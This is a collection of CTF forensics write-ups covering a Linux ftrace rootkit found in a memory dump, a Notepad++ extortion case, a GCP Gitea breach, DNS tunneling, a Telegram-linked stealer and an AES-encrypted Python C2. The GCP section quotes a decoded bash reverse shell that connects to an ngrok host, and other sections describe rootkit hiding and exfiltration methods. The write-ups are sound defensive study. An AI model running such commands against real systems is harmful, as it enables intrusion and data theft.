A critical Linux server began behaving erratically under suspected Volnaya interference, so a full memory snapshot was captured for analysis. Stealthy components embedded in the dump are altering system behavior and hiding their tracks; your task is to sift through the snapshot to uncover these concealed elements and extract any hidden payloads.

Type: Forensics
Difficulty: Hard
Authors: c4n0pus
Event: Global Cyber Skills Benchmark CTF 2025: Operation Blackout (ctftime)

Official write-up:
TBA (but probably here)

Lessons learned/Topics:

• volatility Linux symbols generation

• ftrace hooks

• rootkit concealment and persistence

Initial recon

Given: mem.elf

$ mem.elf (2.170.445.516 bytes)
ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
62760d9d1ae0cc321c0ffa6a41fbfea30e280e51c38643eee0aee371d64ea12d  mem.elf

As usual with any kind of memory dumps, the tool of choice is Volatility Framework.

Getting to know with memory dump of what image I’ll be working on:

$ vol -f ../mem.elf banners.Banners                                                       
Linux version 6.1.0-34-amd64 (debian-kernel@lists.debian.org)
(gcc-12 (Debian 12.2.0-14+deb12u1) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) 
#1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25)

This is quite a recent kernel, and we haven’t been given a symbols file - it could mean that we may have to prepare a symbols file ourselves. Only one way to verify the hypothesis:

No symbols, no output. Let’s obtain them then.

Generating Intermediate Symbols File

ISF allows Volatility to

• Understand kernel data structures like tasks, modules, file descriptors, etc.

• Match the memory layout from the dump to the correct kernel version and configuration.

• Work more efficiently, since the raw debug symbols don’t need to be parsed every time.

First, we have to get hands on the Linux distribution that the memory was dumped from.

I’m downloading Debian from the official site, installing it in the virtual machine. Now we have to match the same kernel.

$ sudo apt install linux-image-6.1.0-34-amd64
$ sudo shutdown -r now

After reboot, we can verify that we have the correct version of the system.

With that, we can proceed with dwarf2json tool (run on the same system).

$ cd /opt
$ git clone https://github.com/volatilityfoundation/dwarf2json.git
$ sudo apt install golang
$ go build -buildvcs=false
$ cd ~
$ sudo /opt/dwarf2json/dwarf2json linux --elf /usr/lib/debug/boot/vmlinux-6.1.0-34-amd64 \
--system-map /boot/System.map-6.1.0-34-amd64 > Debian12-6.1.0-34-amd64.json

Copy the JSON file to the system with volatility under volatility3/volatility3/symbols.

Harvesting runtime artifacts

Challenge after challenge, I keep running the same plugins, so I’ve created a useful script that helps me automate these first steps.

import subprocess, os, sys

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <memory_image>")
        sys.exit(1)

    memory_image = sys.argv[1]
    if not os.path.exists(memory_image):
        print(f"Error: Memory image '{memory_image}' not found.")
        sys.exit(1)

    # Configuration
    venv_activate = "/opt/volatility3/venv/bin/activate"
    output_dir = "./vol"
    os.makedirs(output_dir, exist_ok=True)

    plugins = [
        "linux.bash.Bash",
        "linux.elfs.Elfs",
        "linux.envars.Envars",
        "linux.ip.Link",
        "linux.ip.Addr",
        "linux.lsof.Lsof",
        "linux.malfind.Malfind", # never found anything useful yet, but sounds useful
        "linux.pagecache.Files",
        "linux.psaux.PsAux",
        "linux.pslist.PsList",
        "linux.psscan.PsScan", # potential hidden processes that are not listed in pslist
        "linux.pstree.PsTree",
        "linux.sockstat.Sockstat",
        "linux.lsmod.Lsmod"
    ]

    # Construct the bash command to run all plugins
    joined_plugins = " ".join(plugins)
    bash_command = f'''
    source "{venv_activate}" && \\
    for plugin in {joined_plugins}; do
        echo "[*] Running $plugin"
        vol -f "{memory_image}" $plugin > "{output_dir}/$(basename $plugin).out"
    done
    deactivate
    '''

    # Execute the bash command
    subprocess.run(bash_command, shell=True, executable='/bin/bash')

if __name__ == "__main__":
    main()

At this point, I’m browsing and grepping through the output files to find some suspicious entries. But to keep this article tidy, let’s just go through the questions (in no particular order).

Questions (some)

What is the name of the backdoor udev Rule?

In the output of linux.pagecache.Files we can see references to many /usr/lib/udev/rules.d/ and among them there is one that is definitely not a standard: 99-volnaya.rules. Its existence may potentially mean that the rootkit tries to integrate into the system’s normal device-handling workflow, making its actions blend in with legitimate operations.

Answer: 99-volnaya.rules

What is the resolved IP of the attacker?

When browsing through the linux.sockstat.Sockstat output, a couple of connections stand out:

bash raised TCP connections should always give a warning.

Answer: 16.171.55.6

What is the name of the kernel module?

Because we already know that rootkit uses the volnaya string we can just search for its occurrences in all volatility outputs.

Answer: volnaya_xb127

There is one bash process that is hidden in __USERSPACE__, what is its PID?

There are two indicators of the suspicious bash process present in the volatility outputs.

1. In the aforementioned linux.sockstat.Sockstat potential revshells connections originate from one specific bash process.

2. In the linux.psscan output, we can identify multiple bash processes, but only one is a direct child of systemd and spawns an id command.

Answer: 2957

What is the address of __x64_sys_kill, __x64_sys_getdents64 (ex: kill:getdents64)?

What SYSCALLS are hooked with ftrace, sorted via SYSCALL number (ex: read:write:open)?

These two will be answered by outputs of two more volatility outputs.

volatility -f mem.elf linux.tracing.ftrace.CheckFtrace > vol/linux.tracing.ftrace.CheckFtrace.out
volatility -f mem.elf linux.check_syscall.Check_syscall > vol/linux.check_syscall.Check_syscall.out

ftrace is a kernel-level tracing framework used for debugging and performance profiling. But attackers (or rootkits) can abuse ftrace to hook syscall handlers without modifying the syscall table — making detection harder. So, for example rootkit can intercept a kill signal and perform own code in place of it (can still execute the original syscall making its action very difficult to detect for user). Or can hook to directory listing event and hide its own files before they are printed via ls. Ops, spoilers.

In the output of linux.check_syscall.Check_syscall:

Addresses of kill and getdents64: 0xffffb88b6bf0:0xffffb8b7c770 (answer).

And now the output of the second plugin:

These are all hooks created by the rootkit. Only two of them are syscalls, though.

Answer: kill:getdents64

Yes, one of the flags was included as an format hint to other question. I wonder how many players got that flag just by typing it because it was shown as example? New CTF solving routing discovered?

Extracting rootkit loader

For the rest of the questions, we have to extract the binaries for both volnaya_usr (rootkit loader) and volnaya_xb127 (rootkit kernel module). As long as the binary is cached in the memory, we should be able to dump it with volatility. From the linux.pagecache.Files:

SuperblockAddr    MountPoint  Device   InodeNum   InodeAddr        FileType   InodePages   CachedPages   FileMode     AccessTime                       ModificationTime                 ChangeTime                       FilePath               InodeSize
0x9a097453c800    /           8:1      913940     0x9a0974b68128   REG        107          107           -rwxr-xr-x   2025-05-12 19:20:29.156000 UTC   2025-05-12 19:17:34.102003 UTC   2025-05-12 19:20:12.731680 UTC   /usr/bin/volnaya_usr   437032

We are lucky and volnaya_usr is cached on 107 pages with inode address 0x9a0974b68128. Unfortunately volnaya_xb127 is not (0 pages, and 0 inode size) - but we will take care of it soon. For now, dump the volnaya_usr.

vol -f mem.elf linux.pagecache.InodePages --inode 0x9a0974b68128 --dump

Open it in Ghidra.

What is the XOR key used (ex: 0011aabb)?

In the main function, there is a reference to xor_key. When navigated to the .data section select the label of xor_key so the whole memory segment is selected and choose “Copy special..” → “Byte String (No Spaces)".

Answer: 881ba50d42a430791ca2d9ce0630f5c9

What is the hostname the rootkit connects to?

In the same line of main we can see how the hostname is created. We can navigate to the .data section to copy the content of the hostname and decode the hostname rootkit connects to.

hostname = bytes.fromhex(
    "eb7ac96120c5531232c1b7ad3408c4f8a66dca612cc5491832caadac"
)

xor_key = bytes.fromhex(
    "881ba50d42a430791ca2d9ce0630f5c9"
)

decoded = bytearray()
for i in range(len(hostname)):
    decoded.append(hostname[i] ^ xor_key[i % len(xor_key)])

print(decoded.decode('utf-8', errors='replace'))

Answer: callback.cnc2811.volnaya.htb

Extracting rootkit kernel module

Now the last two questions require looking into the previously unavailable volnaya_xb127. By analysing the code of the loader, especially install_module() function, we can see the following:

syscall is used to call sys_init_module (see linux.check_syscall.Check_syscall, index 0xAF=175) on some binary data located under local_18, of size 0×666c0, passing some argument. We can see that local_18 is a pointer to a deobf() function.

That’s definitely a rootkit kernel module binary. Here is the Python version (copy the elf_body and elf_hdr content from the .data sections.

elf_hdr = bytes.fromhex("7f4..00") # 64-byte ELF header
elf_body = bytes.fromhex("8c..c9") # ELF body

xor_key = bytes.fromhex("881ba50d42a430791ca2d9ce0630f5c9")

# Decrypt body
decrypted_body = bytearray()
for i in range(len(elf_body)):
    decrypted_body.append(elf_body[i] ^ xor_key[i % 16])

# Reconstruct full ELF
with open("volnaya_xb127", "wb") as f:
    f.write(elf_hdr)
    f.write(decrypted_body)

Open volnaya_xb127 in Ghidra.

Here we have a nice listing of all hooks rootkit is setting and functions used to hide its activity.

What string must be contained in a file in order to be hidden?

In each of filldir hooks (that rootkit uses to manipulate directory listing) we can find a filename check. If it contains MAGIC_WORD the file is hidden.

Answer: volnaya

What owner UID and GID membership will make the file hidden (UID:GID)?

Now our focus is moved to the hook_sys_getdents64() function.

By analysing the vfs_fstatat documentation, we can determine that lVar10 contains a structure file metadata structure. Then in UID and GID of the file are stored respectively in iVar8 and iVar2 (through pointer offsetting). Later, those values are compared to the USER_HIDE and GROUP_HIDE which means those last two constants are UID and GID we are looking for.

By converting hexadecimals to decimals, we have the answer.

Answer: 1821:1992

Additional Readings

• Write-up: Forensics: Oblique Final (HTB CA 2024)

• Linux signals

• Build Custom Linux Profile for Volatility

Incident Details

Name: Noted
Category: DFIR
Difficulty: Easy (Solved)

Simon, a developer working at Forela, notified the CERT team about a note that appeared on his desktop. The note claimed that his system had been compromised and that sensitive data from Simon's workstation had been collected. The perpetrators performed data extortion on his workstation and are now threatening to release the data on the dark web unless their demands are met. Simon's workstation contained multiple sensitive files, including planned software projects, internal development plans, and application codebases. The threat intelligence team believes that the threat actor made some mistakes, but they have not found any way to contact the threat actors. The company's stakeholders are insisting that this incident be resolved and all sensitive data be recovered. They demand that under no circumstances should the data be leaked. As our junior security analyst, you have been assigned a specific type of DFIR (Digital Forensics and Incident Response) investigation in this case. The CERT lead, after triaging the workstation, has provided you with only the Notepad++ artifacts, suspecting that the attacker created the extortion note and conducted other activities with hands-on keyboard access. Your duty is to determine how the attack occurred and find a way to contact the threat actors, as they accidentally locked out their own contact information.

Evidences

All evidence files are marked as readonly right after acquiring and their hash is written down. Read-only attribute does not affect the hash of a file.

01: ZIP archive file

$ Noted.zip
0f4628bc37d275178158aa108db8231b15435b79d76230a620c046d9129eaef7

File structure after unzipping:

$ config.xml
85c58374d83d1f47f089ff2fded34958d555c4fa3d2bce3fe50d60865cf05c22
$ session.xml
ebd010709f828e1239e24df5c020e84ba66d3082a523ff399c135b9d2aec96bb
$ LootAndPurge.java@2023-07-24_145332
57177080cac6e0a4ee0f10bc80587b28ac6d2fb38be417711a28b52a7a229523
$ YOU HAVE BEEN HACKED.txt@2023-07-24_150548
3700b7dc69d0f8570485bf8b5a4c4f7f84abcd722dcb7addc609129e418e932e

Analysis

both pastes.io and pastebin.com contain same message.

Password protected

Wow that's quite a lot - is it an address of some kind of cryptocurrency market?

Questions

1. What is the full path of the script used by Simon for AWS operations?

config.xml

2. The attacker duplicated some program code and compiled it on the system, knowing that the victim was a software engineer and had all the necessary utilities. They did this to blend into the environment and didn't bring any of their tools. This code gathered sensitive data and prepared it for exfiltration. What is the full path of the program's source file?

session.xml

3. What's the name of the final archive file containing all the data to be exfiltrated?

LootAndPurge.java

4. What's the timestamp in UTC when attacker last modified the program source file?

session.xml

Great thread on how to decode those values.

This one is really hard in comparison to other questions :P

>>> (31047188 << 32) | (-1354503710 & 0xFFFFFFFF)
133346660033227234

Then use the epoch converter to get the right time.

5. The attacker wrote a data extortion note after exfiltrating data. What is the crypto wallet address to which attackers demanded payment?

6. What's the email address of the person to contact for support?

Both answers in the pastebin note.

Data Recovery

Not needed.

Lessons Learned

• How Notepad++ stores timestamps

Additional readings

• NIST Computer Security Incident Handling Guide

Incident Details

Name: MisCloud
Category: DFIR
Difficulty: Medium (Solved)

My name is John. I am a student who started an e-commerce startup business named "DummyExample" with my partner, James. Initially, I was using WordPress and shared hosting. After experiencing good traffic, I decided to migrate from WordPress to a customized website on Google Cloud Platform (GCP). Currently, my partner and I are working on the website, contributing to a Gitea server hosted on GCP. I migrated all customer data to cloud storage. Recently, my data was breached, and I have no clue how it happened or what was vulnerable. My GCP infrastructure consists of five VM instances and a single Cloud Storage. There is one Windows machine for my partner to use, with very restricted permissions over GCP, only allowing access to his Gitea account. I have two Linux machines for my work, one for hosting the Gitea server and another for packet mirroring. All the machines have public IPs but very restricted access due to firewalls in place. Due to budget constraints, I can't use the Google Security Command Center service, so I am providing you with the VPC network traffic capture and the Google Cloud logs.

Evidences

> get-fileHash  *

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          52645C94618E364F52D33E090A03E73967C907CF5BD2F3FF1851DAF84EBFB9D0       GCloud_Logs.json
SHA256          F4E3AC83B3478E976148F1788C407547A841D529F2E6611DE46EBB210829DBAB       miscloud.zip
SHA256          E233A076D1830B5E8E83FDF82E9888A0B1A9F27B642D79467BB910DC5C3B5D83       VPCNetwork_Traffic.pcap

Analysis

Pretty nice description from our buddy John here 👍. Here is the initial map of the servers I've created.

Quick PCAP statistics in Wireshark:

We have some heavy TCP traffic, including TLS and SSH. Possible sensitive data exfiltration.

These are probably IPs of the servers (10.*.*.* private subnet). There is one another IP being a destination of a single packet.

*.*.*.255 is a broadcast IP and packet is a HostAnnouncement Browser Frame. And it looks like we got a log from the Windows 10 Server (10.128.0.3)

John’s credentials to the Gitea service.

In one of the first packages, we can see the version of Gitea used (1.2.0).

In packet 20213 suspicious response can be seen:

Hmm, the whole traffic there looks suspicious.

It seems like a threat actor uses some kind of vulnerability in Git or Gitea to expose the files on the server (like cusdata.xlsx.enc).

Another packet looks like an RCE.

Decoded base64 (reverse shell): bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14509 0>&1 &

Questions

01. What's the private IP address of the Windows machine?

Seen in the broadcast message: 10.128.0.3.

02. Which CVE was exploited by the threat actor?

Searching for the “Gitea 1.2.0 vulnerabilities” I landed at the CVEdetails

Because I’ve already seen the RCE I’m looking at those four from code executions category. This one looks like what we have here.

03. What is the hostname and port number to which the reverse shell was connecting?

Already discovered: 0.tcp.eu.ngrok.io:14509

04. From which IP address was the CVE exploited, and is this threat an insider or outsider attack?

Packet from which the revshell request originates from is sourced at 10.128.0.3. And it’s a private address, so “inside job”.

05. Which account helped the threat actor to pivot?

Let’s browse the revshell communication.

Here we can see the commands and responses in plaintext.

Packet 13385:
gcloud auth list

Packet 13392:

                  Credentialed Accounts
ACTIVE  ACCOUNT
*       257145238219-compute@developer.gserviceaccount.com

06. Which machines did the threat actor log into? (sorted alphabetically)

That requires more revshell analysis. At some point, we can see that threat actor creates an id_rsa key for SSH purposes and continues from the SSH (revshell traffic gets quieter).

Because question asks which machines being logged into - that is safely to assume that apart from “current” system (10.128.0.4 as stated in the revshell packets) there are other SSHed servers.
ip.src == 10.128.0.4 && ssh && ssh.protocol == "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3"

Other revshell packet exposes all machines’ IPs.

$ gcloud compute instances list
NAME                    ZONE           MACHINE_TYPE  PREEMPTIBLE  INTERNAL_IP  EXTERNAL_IP    STATUS
gitea-vm                us-central1-a  e2-medium                  10.128.0.4   34.66.191.87   RUNNING
linux-machine1          us-central1-a  e2-medium                  10.128.0.7   34.42.164.212  RUNNING
linux-machine2          us-central1-a  e2-medium                  10.128.0.2   34.172.179.63  RUNNING
packet-mirror-instance  us-central1-a  e2-medium                  10.128.0.5   34.28.192.153  RUNNING
windows-machine         us-central1-a  e2-medium                  10.128.0.3   34.45.236.159  RUNNING

Unfortunately, gitea-vm is not accepted in the answer, despite being the first one in the chain - so the correct answer is
linux-machine1,linux-machine2,packet-mirror-instance

07. What's the original name of the sensitive file?

From the included Google Cloud Services logs:

08. Which gcloud role did the threat actor try to assign to the storage bucket to make it publicly accessible?

09. Which account led to the cloud storage data breach?

Searching for the exfiltrated file, leads to the principalEmail

10. Which port number was exploited by the attacker to exfiltrate data that is allowed by default ingress traffic rules in the default VPC network?

I think this one was already found as well in the packet 20213 - 3389 (it is default RDP port).

11. What is the key to decrypt the encrypted file?

This one is a bit of guessing… but it is what it is. HTTP Packet 18001 contains a Python script that was used to encrypt the file:

Another packet, 22604 contains the encrypted binary, which can be saved using File > Export > HTTP object.

When looking closer at the header of the file, it can easily be seen a repeatable phrase that could be an encryption key. After a couple tries, the platform accepts the correct answer.

12. What are the SSN and credit card numbers of "Founder John"?

Now that we have the encryption key, encryption method (symmetrical XOR) and encrypted data, we can put all of those together in CyberChef and get the decrypted spreadsheet.

The file then (so it won’t run it locally) can be previewed, for example on https://filehelper.com/formats/xlsx.

13, 14, 15

Last three questions are knowledge questions, answers for them can be Googled.

Incident Details

Name: Litter
Category: SOC
Difficulty: Easy (Solved)

Khalid has just logged onto a host that he and his team use as a testing host for many different purposes, it’s off their corporate network but has access to lots of resources in network. The host is used as a dumping ground for a lot of people at the company but it’s very useful, so no one has raised any issues. Little does Khalid know; the machine has been compromised and company information that should not have been on there has now been stolen – it’s up to you to figure out what has happened and what data has been taken.

Evidences

All evidence files are marked as readonly right after acquiring and their hash is written down. Read-only attribute does not affect the hash of a file.

01: ZIP archive, password protected (hacktheblue)

$ litter.zip
89ffb7db178388aad03ff1434279e28426be2421d8df6fc9c3afbee94de23b0d

02: PCAP file

$ suspicious_traffic.pcap
830c2c76e8055c6d807f642c684f716e3be73ddc33403d83c85f486086da47ca

Analysis

I've glanced through the PCAP file while having in mind that we have data exfiltration scenario. The first two things that come to my mind are DNS exfiltration and simply uploading data via TCP.

These shouldn't look like that!

1. At a glance, what protocol appears to be suspect in this attack?

DNS!

2. There seems to be a lot of traffic between our host and another, what is the IP address of the suspect host?

Wireshark > Statistics > Endpoints. Select IPv4, sort from the highest Packets.

3. What is the first command the attacker sends to the client?

Technically, it is possible to read what was transmitted using Wireshark display filter

ip.src == 192.168.157.144 and ip.dst == 192.168.157.145 and dns

But there is a Python tool that helps to extract that information from PCAP file.

$ python /opt/dnscat/dnscat_decoder.py suspicious_traffic.pcap "microsofto365.com" > dnscat_dump.txt

All following questions can be answered purely from the dump.

4. What is the version of the DNS tunneling tool the attacker is using?

5. The attackers attempt to rename the tool they accidentally left on the client’s host. What do they name it to?

   

6. The attacker attempts to enumerate the user’s cloud storage. How many files do they locate in their cloud storage directory?

   

7. What is the full location of the PII file that was stolen?

   

8. Exactly how many customer PII records were stolen?

Dump shows 720 records, but starts from 0 s, so the answer is 721.

Data Recovery

None required.

Lessons Learned

Because this challenge was a bit short on analysis part, let's stay a bit on DNS exfiltration.

DNS Data Exfiltration

MITRE ATT.CK Technique: T1048

Data exfiltration is all about flying under the radar. You can steal data simply by copying it to some removable drive (which is not that uncommon). You can upload to cloud service or network share - but these leaves very verbose fingerprint on TCP/UPD communication, network logs etc. The challenge is here that usual protocols can and are easily set up to be monitored against data leakage. Attackers started to get creative and thought - maybe we try to use something that generates a lot of traffic so will not raise an alert, and something that is commonly and widely used, so can't be blocked and won't look suspicious.

DNS protocol meets those standards (that come to my mind, definitely there are more of them). And there were times when no one monitored DNS traffic - because what for? It is more like a technical thing, "how the Internet works" thing - domain names act as mnemonics for specific IP addresses, so something has to resolve them. We can't drop it, we can't stop DNS resolution at all. And each system, each software, can generate a lot of DNS queries on daily routine. Windows Update, loading CSS or JS on pages, virus signatures updates, requesting data from services - all of these happen via named mnemonics, not IP addresses.

So how attackers figured out the way to use it as a form of connection between C&C and a victim? This is to be honest quite simple and easy to explain.

1. Assume that malware is already present on the victim's server.

2. Encode data (C&C command response, file, anything) to hex-encoded blocks, as if requesting DNS server to resolve the domain - conforming one of two formats (really oversimplified)
   <encoded data>.<domain> or <tag>.<encoded data>

3. Pass the prepared message as a DNS request to the attacker's server.

That's why in this challenge, we could eyeball the suspiciously looking DNS request - no-one is asking to resolve the following domain name: 7768656e6d6f7265636861696e7361776d616e736572696573.microsofto.com

Additional readings

• NIST Computer Security Incident Handling Guide

• GitHub: dnscat2 protocol

In Eldoria, a once-innocent website called “Tales for the Brave” has become the focus of unsettling rumors. Some claim it may secretly trap unsuspecting visitors, leading them into a complex phishing scheme. Investigators report signs of encrypted communications and stealthy data collection beneath its friendly exterior. You must uncover the truth, and protect Eldoria from a growing threat.

Type: Forensics
Difficulty: Hard
Authors: connar, rasti
Event: Hack The Box Cyber Apocalypse 2025: Tales From Eldoria (ctftime)

Official write-up:
https://github.com/hackthebox/cyber-apocalypse-2025/tree/main/forensics/Tales%20for%20the%20Brave

Initial recon

Given: IP:PORT

After closer inspection, it appears to be the address to the website.

The source code reveals two important imports:

<!DOCTYPE html>
<html lang="en">
<head>
  <!-- cut -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/crypto-js.js"></script>
</head>
<body>
  <!-- cut -->
  <script src="js/index.js"></script>
</body>
</html>

index.js contains some encrypted payload that is evaluated, possibly on the page load.

Crypto-JS appears to be a JavaScript library for cryptography operations. This one used here is an ancient and outdated.

On browsing, the website presents itself as a newsletter subscription form.

Analysis

Let’s unravel the suspicious code.

Stage 01

The first stage contains two phases - building the strings array and evaluation of the encrypted code (stored in a binary format). Because of the variables names and as it appears to be an encryption method, we can infer this is AES encryption (ciphertext, encryption key and IV vector).

After quick deobfuscation (array and btoa(..) evaluations, eval removal).

After evaluating all of that and converting from hex to text, we can continue with a second stage.

Stage 02

This one contains several more strings dictionaries that are used to build the actual JavaScript code. After some doebfuscation, formatting and removal of unnecessary code, the remaining JavaScript can be described as a puzzle that can be solved by inputting a specific value in pre-@ email value on the form and clicking in the checkboxes in a predetermined sequence. As a reward, the solver is redirected to the unknown URL that was placed as a message sent on Telegram. Fortunately, we don’t have to predict any of that and can focus on the Telegram method alone.

Telegram Bot API

What this code does is calling the Telegram Bot API (hhtps://api.telegram.org/*/forwardMessage) to forward a one message (message_id=5) from the specific group chat (channel_id) to some other group (idc). This code contains all the necessary information to do such a call - apart from the target chat.

I don’t want to download any unnecessary software and create third-party accounts just for the CTF purposes, so I’ve tried to dig as much as possible without doing any of that. API documentation gives a good idea of what can be done, so I’ve called a couple of endpoints to see what I can get.

The name suggests we are on the right track, can_join_groups flag is set so it confirms the forwardMessage scenario. Another response (/getUpdates endpoint) gets me puzzled.

This appears to be a log of what is sent by the bot, or to that bot? But is it an artificial conversation to flavour the challenge? Are those other participants chatting together? Should I do the same? One of the threads got my special interest:

Well, I think I’ll never find if that’s a real chat between participants or just something coded to appear indefinitely during the event. Either way, I just don’t have any other option to try - requesting the bot to forward me a message should be a way to go.

Exfiltrating the private chat

To do so, I found no other way than actually downloading the Telegram app (through the APK, barbaric and shady) and creating a private group. Then, when I had that set up, I’ve invited the OperationEldoriaBot, and now I need my group ID. Quick research (no, it can’t be found in HTML and network traffic) helped me find a way to get it. I’ve invited the “GetIDsBot” to the group and voilà.

I’ve passed that ID in the forwardMessage call… but got the error:

I have spent the next two hours or so on finding a solution to that. I’ve searched many StackOverflow posts, GitHub and Redid discussions and two things that were most frequently mentioned: is the bot added as an administrator and is that a public or a private group. I did many combinations of those, at the end finding that when I once changed the group from private to public it gets promoted to “supergroup” permanently and is assigned a different ID - but that didn’t help.

Then I literally went to the bathroom, ate something (not in the bathroom) and came back to the challenge to find out that the last API call I’ve tried now returns a success message. I guess some cache somewhere had to expire.

Now with a new tool at my disposal, I can forward message by message all chat messages from that Telegram group (I have skipped a message with ID=5 because it only contains an expired group invitation).

I’m downloading the archive and unzip it using the provided password.

Brave.exe

File responds as Portable Executable (PE) for Windows. When I try to open them with any of my decompilers, they do not report anything useful. Then I’ve checked the file with DIE (Detect-It-Easy).

Report from VirusTotal indicates that’s a stealer malware. Because I’m unable to decompile it in each known to me tool, there is another way. To run it in an isolated environment and observe.

Malware execution analysis

For this, I’ll be using FlareVM. It’s a streamlined Windows Malware Analysis Suite over Windows.

After copying the Brave.exe I’m opening the API Monitor. For this scenario (because of trial and error) I’m using “Data Access and Storage” and “Internet” modules/behaviours. Immediately I can see that the malware tries to seek some folder and ends execution.

Let’s create the folder and try once again.

mkdir 'C:\Users\Asentinn\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb'

Now it looks like it is trying to reach the C&C under zOlsc2S65u.htb:31337 - but obviously, it cannot.

Adding domain to the hosts file, starting python -m http.server 31337 - and nothing changes. Now that I think about it - it was meant to exfiltrate data. So let’s give it some data.

# Run in the leveldb folder
"htbrulez" > fake.db

Starting process once again - and here we have.

It looks like it sends the data with a POST request. What keen eye notices is that communication comes with an Authorization Bearer Token:

Pasting that into jwt.io:

And Base64 decoding twice the auth portion:

Additional reading

• Malware deobfuscation by John Hammond - I’ve learned from this video a couple years ago

• Extensive FlareVM installation instructions

• More Windows executables shenanigans like R2R and stomping

In the bustling town of Eastmarsh, Garrick Stoneforge’s workshop site once stood as a pinnacle of enchanted lock and toolmaking. But dark whispers now speak of a breach by a clandestine faction, hinting that Garrick’s prized designs may have been stolen. Scattered digital remnants cling to the compromised site, awaiting those who dare unravel them. Unmask these cunning adversaries threatening the peace of Eldoria. Investigate the incident, gather evidence, and expose Malakar as the mastermind behind this attack.

Type: Forensics
Difficulty: Medium
Event: Hack The Box Cyber Apocalypse 2025: Tales From Eldoria (ctftime)
Author: thewildspirit

Official write-up:
https://github.com/hackthebox/cyber-apocalypse-2025/tree/main/forensics/ToolPie

Initial recon

Given:

$ sha256sum *
03b6b7b65e4a2cd1b02b35ef814ce79c2d6746436394f7b42757cb0c4d79f88a  capture.pcap

$ wc -c *
8613560 capture.pcap

Archive contains only capture.pcap - which given its size (over 8.5 MB) it can be expected to contain some binary data exchange.

Investigation

Start wireshark and let’s see what we have there.

Brief scrolling through the packets show a lot of TCP packets. Borrowing the presentation technique from the author let’s do not infer the conclusions based on the glance of such inferior and unreliable tool like an eye. Statistics > Protocol Hierarchy - yes, majority of traffic is TCP data.

We can go furhter and check Statistics > Conversations:

One route stands out and it’s the one that transferred ~9MB of data to the 13.61.7.218 on port 55155. Because we’ve already seen the HTTP requests, ports :80 and :443 should not be that suspicious (but only in this CTF scenario, usually :80 is something that should be given special care).

01. What is the IP address responsible for compromising the website?

We have one IP on the radar - but so far we only know that it is where probably exfiltrated data were sent. We still don’t know who initiated the attack. Because question especially asks about the website, let’s check all HTTP traffic.

One specific raw stands out - /execute coming from 194.59.6.66. Packet details ultimately points that this indeed was mallicious intent.

Answer: 194.59.6.66

02. What is the name of the endpoint exploited by the attacker?

Already found.
Answer: execute

03. What is the name of the obfuscation tool used by the attacker?

Decode the payload sent to the /execute endpoint. Right click on JavaScript Object Notation: application/json, Show Packet Bytes, select Show as JSON and save. Little clean up and we have stage 1, python script:

We can further analyze the object.

import marshal,lzma,gzip,bz2,binascii,zlib

compressed_data = b'BZh91AY&SY\x8d <<binary data>>'
marshalled_object = bz2.decompress(compressed_data)
code = marshal.loads(marshalled_object)

print(type(code))

# List all attributes and methods of the object
print("Available attributes and methods:", dir(code))

# Filter and show only callable methods
methods = [m for m in dir(code) if callable(getattr(code, m))]
print("Callable methods:", methods)

if hasattr(code, "co_consts"):
    print("Constants:", code.co_consts)
else:
    print("No constants found")

if hasattr(code, "co_names"):
    print("co_names:", code.co_names)
else:
    print("No co_names found")

if hasattr(code, "co_varnames"):
    print("co_varnames:", code.co_varnames)
else:
    print("No co_varnames found")

At this point we can see many references to the Py-Fuscate.

Answer: Py-Fuscate

04. What is the IP address and port used by the malware to establish a connection with the Command and Control (C2) server?

This was already established in initial recon and doubled in the output of previous script.

Answer: 13.61.7.218:55155

05. What encryption key did the attacker use to secure the data?

In the output of previous script we see references to the Crypto.Cipher package and AES - so with great probability we can assume that indeed AES was used to encrypt data. This alghoritm needs two parameters to work - encryption key and IV vector. Usually encryption key is constant and known for the decryptor and IV vector is different for each ciphertext. In the easiest way, IV vector is sent in plain text together with the encrypted data.

For this and the next question we first have to somehow disassembly the Python bytecode. The most straighforward is to use dis package.

Dissassembling Python bytecode

This can be done using dis.dis(). One caveat with that is the method returns None and prints directly to the standard output. One way to catch is to redirect call to some file (python dismal.py > source.dis)

import marshal,lzma,gzip,bz2,binascii,zlib
import dis

# Compressed data (example)
compressed_data = b'<<bytecode>>'
marshalled_object = bz2.decompress(compressed_data)
code = marshal.loads(marshalled_object)
dis.dis(code)

We ends with semi-readable pseudo code that looks a lot like an assembler code.

It is problematic to discuss how I’ve analyzed the pseudocode, but at this point this fragment is most important to us:9

This can be translated to Python code:

cypher = AES.new(key.encode(), AES.MODE_CBC, key.encode())

And here is where the attacked made a mistake - in his encryption alghoritm used the same value for both encryption key and IV vector.. and passed that value in plaintext together with the encrypted data.

client.send((user+SEPARATOR+k).encode())

Inspecting TCP packets sent to C&C:

Answer: 5UUfizsRsP7oOCAq

06. What is the MD5 hash of the file exfiltrated by the attacker?

We have all the information needed to recover the file.

In wireshark Analyze > Follow … > TCP Stream. Find stream with big chunks of data, select only communication to C&C, raw (important later) and save.

Now open up CyberChef. Input AES paremeters we know.

With this we can further decode all top 4 lines from the wireshark view.

1. Some bytes

2. check-ok

3. ok

4. 8504240

When you hover over the packet details in the “Follow TCP Stream” you can see from which packet data comes from:

Clear all filters and navigate to packet no. 91 - now two packets before, in 89, there is request from C&C for which response was number 8504240. Select packet 89, select Data segment, right click and copy value. This is another way to acquire the packet data from a single packet.

Decrypted value gives us information that C&C requested a PDF file and 8504240 is its size in bytes.

Now, come back to the “Follow TCP Stream” window, ensure only traffic to C&C is selected and save. Do hexdump of the saved data.

Notice that we have an unwated data at the beginning of the encrypted file. Content starts from e1 4c fe a8 (see the content of packet 94 or 5th line in “Follow TCP Stream”). Now, to carve out the unncessary data, we have to remove that many bytes (e1 starts after 69 bytes in hexadecimal base):

$$(60+9){(16)} = 105{(10)}$$

$ dd skip=105 bs=4096 iflag=skip_bytes if=raw.enc of=rawdata.enc

The result should look like this

Now upload file to the CyberChef and decode the PDF file.

Save the file and calculate its MD5, or just add MD5 block in CyberChef.

Answer: 8fde053c8e79cf7e03599d559f90b321

Bonus: pycdc

